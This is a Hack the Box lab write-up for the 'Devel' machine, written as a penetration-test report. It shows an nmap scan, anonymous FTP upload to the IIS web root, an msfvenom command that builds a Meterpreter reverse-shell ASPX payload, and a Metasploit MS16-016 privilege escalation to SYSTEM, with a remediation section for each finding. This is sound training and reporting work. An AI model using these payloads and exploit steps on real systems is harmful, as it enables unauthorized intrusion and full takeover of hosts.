HTB Devel

HTB Devel is an easy level Hack the Box challenge.


Devel is an IIS server that has multiple vulnerabilities, which were able to be exploited to the ends of gaining local administrative privilges.

The box presents a major initial access vulnerability in having an exposed FTP server that permits anonymous logon with write permissions into the IIS wwwroot. This allows an attacker to gain initial access by uploading a malicious aspx script.

Once initial access is gained, the system is internally vulnerable to CVE-2016-0051/MS16-016, which allows for local privilege escalation to NT AUTHORITY\SYSTEM.

Service Enumeration

Nmap Scan results

└─$ sudo nmap -sC -sV -T 4 -vvv -Pn

map scan report for
Host is up, received user-set (0.051s latency).
Scanned at 2023-08-25 14:37:05 UTC for 18s
Not shown: 998 filtered tcp ports (no-response)
21/tcp open  ftp     syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    syn-ack ttl 127 Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
port protocol version notes
TCP 21 FTP MS FTPd Anon logon permitted; looks like it contains IIS stuff.

An initial nmap scan was run, revealing an FTP server that permitted anonymous logon. Upon discovery, logon was successfully attempted. Write permissions were successfully tested for by uploading a text document containing the string "it worked" into the root directory of the server.

Noticing that the files in the directory appeared to be IIS default files, an attempt was successfully made to view the file through the IIS web interface. This proved that the directory presented by the FTP server was indeed the IIS wwwroot.

From here, a malicious ASPX script was created with MSFvenom, uploaded to the server via FTP and accessed, resulting in a user level compromise.

Vulnerability Explanation

By leaving the FTP server open to anonymous logon and write, an attacker is able to arbitrarily upload files, including malicious files that can then be executed by the web server.

Vulnerability Fix

Several factors can be altered in order to correct this issue:

  • Please consider securing FTP with a strong password and disabling any sort of anonymous logon.
  • FTP is an unencrypted protocol. Please consider making it only available to the local network, and then using a VPN in order to make it available to remote users.
  • Additionally, please consider implementing an EDR system in order to halt the execution of common malicious shellcode such as Meterpreter.
  • Also consider utilizing an IDS/IPS in order to halt signatured malicious network traffic as is generated by tools like Meterpreter.


Internally assessed CVSS 3.0: 9.5 critical.

Proof Of Concept Code

Command line used to generate initial access shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f aspx >reverse.aspx

Proof Screenshot

Proof Text


Privilege Escalation

Once an initial access shell was acheived, the meterpreter session was backgrounded and Metasploit's local exploit suggester was utilized in order to discover a potential privilege escalation vector.

After trial and error with the returned results, exploit/windows/local/ms16_016_webdav was utilized successfully to return a reverse shell session as NT AUTHORITY\SYSTEM.

Vulnerability Explanation



The WebDAV client in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "WebDAV Elevation of Privilege Vulnerability."

Vulnerability Fix

Several remedies exist for this vulnerability:

  • Please consider updating Windows. This vulnerability exists only in Windows 7/Server 2008 and lower. Modern Windows 10 and 11 should not be vulnerable.
  • If this host must use Windows 7/Server 2008, please consider applying the security update referenced in this article from Microsoft.


Internally assessed CVSS 3.0: 8.2 high.

Official per NIST: 7.2 high. Reference

Proof Of Concept Code

Exploitation was accomplished with unmodified public exploit. Source can be reviewed here.

MSF Module Config:

Module options (exploit/windows/local/ms16_016_webdav):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP1

Proof Screenshot

Proof Text
